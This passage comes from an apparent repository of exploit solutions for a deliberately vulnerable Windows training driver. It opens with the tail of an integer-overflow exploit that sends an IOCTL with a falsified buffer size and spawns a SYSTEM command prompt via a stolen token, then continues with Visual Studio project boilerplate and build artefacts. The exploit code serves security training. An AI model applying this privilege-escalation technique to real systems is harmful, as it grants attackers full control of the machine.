81 | 	DeviceIoControl(devHandle, 0x222027, inBuffer, 0xFFFFFFFF, NULL, 0, &bytesReturned, (LPOVERLAPPED)NULL); // Important to note, we usually do sizeof(inBuffer) or something similar here when we pass the size into the call, but this doesn't have to be this. WE CAN LIE! >:D
82 | 	
83 | 	printf("Sweet shells now raining...\r\n");
84 | 	PROCESS_INFORMATION pi;
85 | 	ZeroMemory(&pi, sizeof(pi));
86 | 	STARTUPINFOA si;
87 | 	ZeroMemory(&si, sizeof(si));
88 | 	si.cb = sizeof(si);
89 | 	CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); // Spawn cmd.exe with SYSTEM privs as we have now stolen the SYSTEM token.
90 | 	
91 | 	return 0;
92 | }


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{0E8499B0-F7B7-4FD5-B340-EB570568CAEE}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>HEVDIntegerOverflowExploit</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |     </Link>
 95 |   </ItemDefinitionGroup>
 96 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 97 |     <ClCompile>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <Optimization>Disabled</Optimization>
101 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |     </ClCompile>
103 |     <Link>
104 |       <SubSystem>Console</SubSystem>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
119 |       <OptimizeReferences>true</OptimizeReferences>
120 |     </Link>
121 |   </ItemDefinitionGroup>
122 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
123 |     <ClCompile>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <PrecompiledHeader>Use</PrecompiledHeader>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemGroup>
138 |     <Text Include="ReadMe.txt" />
139 |   </ItemGroup>
140 |   <ItemGroup>
141 |     <ClInclude Include="stdafx.h" />
142 |     <ClInclude Include="targetver.h" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="HEVD - Integer Overflow Exploit.cpp" />
146 |     <ClCompile Include="stdafx.cpp">
147 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
151 |     </ClCompile>
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="HEVD - Integer Overflow Exploit.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : HEVD - Integer Overflow Exploit Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this HEVD - Integer Overflow Exploit application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your HEVD - Integer Overflow Exploit application.
 9 | 
10 | 
11 | HEVD - Integer Overflow Exploit.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | HEVD - Integer Overflow Exploit.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | HEVD - Integer Overflow Exploit.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named HEVD - Integer Overflow Exploit.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // HEVD - Integer Overflow Exploit.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/HEVD - Integer Overflow Exploit/HEVD - Integer Overflow Exploit/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.16
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HEVD-GDI-Bitmap-Exploit", "HEVD-GDI-Bitmap-Exploit\HEVD-GDI-Bitmap-Exploit.vcxproj", "{21A858B1-3918-4C0C-912B-F6D689AC0178}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Debug|x64.Build.0 = Debug|x64
18 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Debug|x64.Deploy.0 = Debug|x64
19 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Debug|x86.ActiveCfg = Debug|Win32
20 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Debug|x86.Build.0 = Debug|Win32
21 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Release|x64.ActiveCfg = Release|x64
22 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Release|x64.Build.0 = Release|x64
23 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Release|x86.ActiveCfg = Release|Win32
24 | 		{21A858B1-3918-4C0C-912B-F6D689AC0178}.Release|x86.Build.0 = Release|Win32
25 | 	EndGlobalSection
26 | 	GlobalSection(SolutionProperties) = preSolution
27 | 		HideSolutionNode = FALSE
28 | 	EndGlobalSection
29 | EndGlobal
30 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI-Bitmap-Exploit.log:
--------------------------------------------------------------------------------
1 |   HEVD-GDI-Bitmap-Exploit.cpp
2 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(42): warning C4477: 'printf' : format string '%llx' requires an argument of type 'unsigned __int64', but variadic argument 1 has type 'FARPROC'
3 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(42): warning C4313: 'printf': '%x' in format string conflicts with argument 1 of type 'FARPROC'
4 |   HEVD-GDI-Bitmap-Exploit.vcxproj -> C:\Users\test\documents\visual studio 2017\Projects\HEVD-GDI-Bitmap-Exploit\Debug\HEVD-GDI-Bitmap-Exploit.exe
5 |   HEVD-GDI-Bitmap-Exploit.vcxproj -> C:\Users\test\documents\visual studio 2017\Projects\HEVD-GDI-Bitmap-Exploit\Debug\HEVD-GDI-Bitmap-Exploit.pdb (Partial PDB)
6 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI-Bitmap-Exploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI-Bitmap-Exploit.obj


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI-Bitmap-Exploit.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI-Bitmap-Exploit.pch


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/HEVD-GDI-Bitmap-Exploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\test\documents\visual studio 2017\Projects\HEVD-GDI-Bitmap-Exploit\|
3 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/HEVD-GDI.21A858B1.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/HEVD-GDI-Bitmap-Exploit.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{21A858B1-3918-4C0C-912B-F6D689AC0178}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>HEVDGDIBitmapExploit</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
